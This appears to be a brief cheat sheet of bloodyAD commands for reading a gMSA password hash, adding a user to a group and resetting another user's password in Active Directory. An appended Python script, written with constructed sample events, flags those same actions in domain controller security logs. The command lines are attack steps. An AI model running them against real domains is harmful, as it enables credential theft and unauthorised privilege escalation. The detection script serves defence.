【AD】bloodyAD

1. Common usage

1.1. Read the gMSA password

bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get object "$TargetObject" --attr msDS-ManagedPassword

Running this returns the hash of the group managed service account (gMSA).

1.2. Add a user to a group

# Add the user
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add groupMember "$TargetGroup" "$TargetUser"

# Query the specified user's membership; can be used to check whether the add succeeded
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get membership "$TargetUser"


1.3. Change a user's password

bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set password "$TargetUser" "$NewPassword"

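Each of the three operations above leaves a trace in the domain controller's Security log. The following is an added example, not part of the original note or of bloodyAD: a small Python triage over exported events. The sample events, account names and allow-lists are constructed assumptions.

```python
# Added example: flag the three operations from this note in DC Security events.
# Events are constructed samples, reduced to the fields the rules read.
MANAGED_PASSWORD_GUID = "e362ed86-b728-0842-b27d-2dea7a9df218"  # msDS-ManagedPassword schemaIDGUID
OBJECT_ACCESS_ID = 4662             # directory object access; only logged if a SACL audits the gMSA
GROUP_ADD_IDS = {4728, 4732, 4756}  # member added to a global / local / universal security group
PASSWORD_RESET_ID = 4724            # attempt to reset another account's password

# Assumption: accounts expected to perform these actions; everything else is reported.
ALLOWED_GMSA_READERS = {"WEB01$"}
ALLOWED_ADMINS = {"helpdesk-admin"}

def classify(event):
    """Return a finding string for an unexpected event, or None."""
    eid = event["EventID"]
    actor = event.get("SubjectUserName", "")
    if eid == OBJECT_ACCESS_ID:
        props = event.get("Properties", "").lower()
        if MANAGED_PASSWORD_GUID in props and actor not in ALLOWED_GMSA_READERS:
            return f"gMSA password read on {event.get('ObjectName')} by {actor}"
    elif eid in GROUP_ADD_IDS and actor not in ALLOWED_ADMINS:
        # In group-change events TargetUserName holds the group name.
        return f"{actor} added {event.get('MemberName')} to group {event.get('TargetUserName')}"
    elif eid == PASSWORD_RESET_ID and actor not in ALLOWED_ADMINS:
        return f"{actor} reset the password of {event.get('TargetUserName')}"
    return None

def scan(events):
    """Classify every event and keep only the findings."""
    return [finding for finding in map(classify, events) if finding]

GMSA_DN = "CN=svc_web,CN=Managed Service Accounts,DC=example,DC=test"  # constructed
SAMPLE_EVENTS = [  # constructed
    {"EventID": 4662, "SubjectUserName": "WEB01$", "ObjectName": GMSA_DN,
     "Properties": "%%7684 {e362ed86-b728-0842-b27d-2dea7a9df218}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "ObjectName": GMSA_DN,
     "Properties": "%%7684 {E362ED86-B728-0842-B27D-2DEA7A9DF218}"},
    {"EventID": 4728, "SubjectUserName": "jdoe", "TargetUserName": "Domain Admins",
     "MemberName": "CN=jdoe,CN=Users,DC=example,DC=test"},
    {"EventID": 4724, "SubjectUserName": "helpdesk-admin", "TargetUserName": "asmith"},
    {"EventID": 4724, "SubjectUserName": "jdoe", "TargetUserName": "asmith"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```
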